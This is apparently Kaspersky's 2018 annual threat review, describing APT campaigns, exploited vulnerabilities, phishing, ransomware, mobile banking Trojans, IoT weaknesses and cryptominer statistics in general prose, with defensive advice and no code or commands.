Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre respectively, they both allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Brower extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where lack of standardization leaves developers to ignore security, or consider it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to man-in-the-middle (MitM) attacks—intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

Kaspersky Security Bulletin 2018. Story of the year: miners

Cryptocurrency miners that infect the computers of unsuspecting users essentially operate according to the same business model as ransomware programs: the victim’s computing power is harnessed to enrich the cybercriminals. Only in the case of miners, it might be quite a while before the user notices that 70–80% of their CPU or graphics card power is being used to generate virtual coins. Encrypted documents and ransomware messages are far harder to miss.

Cryptominers usually find their way onto user computers and corporate machines along with adware, hacked games, and other pirated content. What’s more, the present “entry threshold” — that is, the actual process of creating a miner — is rather low: cybercriminals are assisted by ready-to-use affiliate programs, open mining pools, and miner builders. If that weren’t enough, there is another way to steal computing resources through a webpage-embedded mining script that starts when the user opens the site in a browser.  A separate category of cybercriminals are those who target not private computers, but the servers of large companies, for which the infection process is considerably more resource-intense.

2018 began with a rise in the number of miner-related attacks. However, after a drop in the value of the main cryptocurrencies, which lasted from January to February, infection activity noticeably declined. General interest in cryptocurrencies also waned.  Yet the graph clearly shows that while the number of cryptominer attacks decreased, the threat is still current. As for how the November collapse in the Bitcoin exchange rate will affect the number of infections, time will tell.

Number of unique users attacked by miners in Q1–Q3 2018 (download)

Hidden mining software was very popular among botnet owners, as confirmed by our statistics on files downloaded by zombie networks: Q1 2018 saw a boom in cryptominers, and the share of this malware in the first half of the year was 4.6% of the total number of files downloaded by botnets. For comparison, in Q2 2017 this figure was 2.9%. It follows from the data that cybercriminals have come to view botnets as a means of spreading software for mining cryptocurrencies.

H2 2017 H1 2017
1 Lethic 17.0% njRAT 5.2%
2 Neutrino.POS 4.6% Lethic 5.0%
3 njRAT 3.7% Khalesi 4.9%
4 Emotet 3.5% Miners 4.6%
5 Miners 2.9% Neutrino.POS 2.2%
6 Smoke 1.8% Edur 1.3%
7 Cutwail 0.7% PassView 1.3%
8 Ransomware 0.7% Jimmy 1.1%
9 SpyEye 0.5% Gandcrab 1.1%
10 Snojan 0.3% Cutwail 1.1%

Most downloaded threats, H2 2017–H1 2018

Still on the topic of botnets, it is impossible not to mention that in Q3 2018 we registered a decline in the number of DDoS attacks, the most likely reason being, according to our experts, the “reprofiling” of botnets from DDoS attacks to cryptocurrency mining. This was induced not only by the high popularity of cryptocurrencies, but also the high competition in the “DDoS market”, which made the attacks less expensive for clients, but not for the botnetters themselves, who still have to cope with more than a few less-than-legal “organizational issues.”

Mining differs favorably for cybercriminals in that, if executed properly, it can be impossible for the owner of an infected machine to detect, and thus the chances of encountering the cyberpolice are far lower. And the reprofiling of existing server capacity completely hides its owner from the eyes of the law. Evidence suggests that the owners of many well-known botnets have switched their attack vector toward mining.  For example, the DDoS activity of the Yoyo botnet dropped dramatically, although there is no data about it being dismantled.

Moreover, mining has started to command as much (or more) attention as ransomware: this year we encountered several examples of reprofiled malware with added functionality for cryptocurrency mining. And the techniques used by the creators of miners have become more sophisticated.

For instance, an interesting miner implementation, which we dubbed PowerGhost, caught our eye in July this year. The malware can stealthily establish itself in the system and spread inside large corporate networks, infecting workstations and servers alike. To go unnoticed by users and security solutions for as long as possible, the miner employs various fileless techniques. Infection occurs remotely using exploits or remote management tools (Windows Management Instrumentation), and involves running a single-line powershell script that downloads the main body of the malware and immediately starts it without writing to the hard drive.

Another example of reprofiling is the ransomware Trojan Trojan-Ransom.Win32.Rakhni, the first samples of which were detected by Kaspersky Lab back in 2013. Its mining functions are a 2018 innovation. At the same time, their activation depends on whether the folder %AppData%\Bitcoin is present on the infected machine. If it exists, the loader downloads the ransomware. If there is no such folder and, in addition, the computer has more than two logical processors, a miner is downloaded. To keep the malware hidden in the system, the developers made it look like an Adobe product. This can be seen by the icon and the name of the executable file, as well as the fake digital signature, which uses Adobe Systems Incorporated as the company name.

Another piece of malware that has learned how to seed computers with mining utilities is the previously adware-only PBot. The malware spreads through affiliate sites that inject scripts into their pages for redirecting users to sponsored links. The standard distribution scheme looks as follows:

  1. The user visits one of the sites in the affiliate network.
  2. Clicking anywhere on the page causes a new browser window to appear, where an intermediate link opens.
  3. The link directs the user to the PBot download page, which is tasked with downloading and running the malware by deceptive means.

The most common coin among all illegally mined cryptocurrencies is Monero (xmr). This is due to its anonymous algorithm, relatively high market value, and ease of sale, since it is accepted by most major cryptocurrency exchanges. For botnets mining this coin illegally, it is important that CPU resources can be utilized. By some accounts, a total of $175 million has been mined illegally, representing around 5% of all Monero currently in circulation.

Factors affecting the distribution of miners

The conclusion based on data we obtained from various sources is that legislative control over cryptocurrencies has little impact on the spread of hidden mining. For example, in Algeria and Vietnam cryptocurrencies are either prohibited or severely restricted under domestic law. Yet Vietnam is third in the ranking of leading countries by number of miner attacks, and Algeria is sixth. Meanwhile, Iran, which is presently drafting legislation to govern cryptocurrency and developing plans to issue its own “coins,” is in seventh place.

Country Cryptocurrency status % of attacks
Kazakhstan Not prohibited, Not legalized 16.75%
Vietnam Issuance (mining) prohibited 13.00%
Indonesia Recognized as an exchange commodity 12.87%
Ukraine Circulation governed by law 11.19%
Russia Legislation under consideration 10.71%
Algeria Prohibited 9.03%
Iran Legislation in preparation, creation of own cryptocurrency planned 7.21%
India Ban under consideration, hearings in progress 7.20%
Thailand Circulation governed by law 6.76%
Taiwan Not prohibited 5.81%

Top 10 countries by share of miner attacks, January–October 2018 (includes only countries with more than 500,000 Kaspersky Lab clients)

At the other end of the scale, US users were the least affected by cryptominters (1.33% of the total number of attacks), followed by users in Switzerland (1.56%) and Britain (1.66%).

Map representing countries with the lowest share of miner attacks, January–October 2018 (includes only countries with more than 500,000 Kaspersky Lab clients) (download)

The prevalence of miners is not impacted by the cost of electricity, which varies greatly from country to country. Again, this factor is not a consideration for cybercriminals as they exploit third-party resources.

Distribution methods

Looking at the distribution of pirated software in countries with the highest number of miner attacks, one sees a clear correlation: the more freely unlicensed software is distributed, the more miners there are. This is confirmed by our statistics, which indicates that miners most often land on victim computers together with pirated software.

Another penetration vector for miners is adware installers distributed using social engineering. More sophisticated options (for example, propagation through vulnerabilities such as EternalBlue) are aimed at server capacities and are less frequently encountered.

And it should not be forgotten that USB drives have been used to distribute cryptocurrency mining software since at least 2015. The percentage of detections of the popular Bitcoin miner Trojan.Win64.Miner.all on removable devices is growing annually by about one-sixth. In 2018, one in ten users affected by malware transmitted through flash drives was the victim of this particular miner (roughly 9.22%; for comparison, in 2017 it was 6.7%, and in 2016 4.2%).

Millions of unique users found to have malware in the root directory, which is the main sign of infection via removable drives, 2013–2018. Source: KSN (download)

